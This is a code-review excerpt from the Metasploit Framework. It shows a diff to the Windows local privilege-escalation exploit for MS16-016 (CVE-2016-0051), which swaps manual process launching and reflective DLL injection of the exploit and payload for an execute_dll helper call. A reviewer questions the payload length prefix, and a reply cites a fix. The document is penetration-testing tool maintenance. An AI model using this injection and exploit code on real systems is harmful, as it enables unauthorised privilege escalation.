modules/exploits/windows/local/ms16_016_webdav.rb

```diff
@@ -71,25 +71,14 @@ def exploit
       fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
     end
 
-    print_status("Launching notepad to host the exploit...")
-    notepad_process_pid = cmd_exec_get_pid("notepad.exe")
-    begin
-      process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
-      print_good("Process #{process.pid} launched.")
-    rescue Rex::Post::Meterpreter::RequestError
-      print_error("Operation failed. Hosting exploit in the current process...")
-      process = client.sys.process.open
-    end
-
-    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
-    library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
-    library_path = ::File.expand_path(library_path)
-    exploit_mem, offset = inject_dll_into_process(process, library_path)
-    print_status("Exploit injected ... injecting payload into #{process.pid}...")
-    payload_mem = inject_into_process(process, payload.encoded)
-    thread = process.thread.create(exploit_mem + offset, payload_mem)
+    print_status('Launching a process to host the payload DLL, then reflectively injecting the DLL and running it...')
+    encoded_payload = payload.encoded
+    execute_dll(
+      ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll"),
+      [encoded_payload.length].pack('I<') + encoded_payload
```

Comment:
This does not look like the payload is expecting the length to be prefixed to it.

Reply:
Resolved with https://github.com/rapid7/metasploit-framework/pull/15384/commits/4ab1b6ca11cc7b025da6094ec4552eaaa8ad657b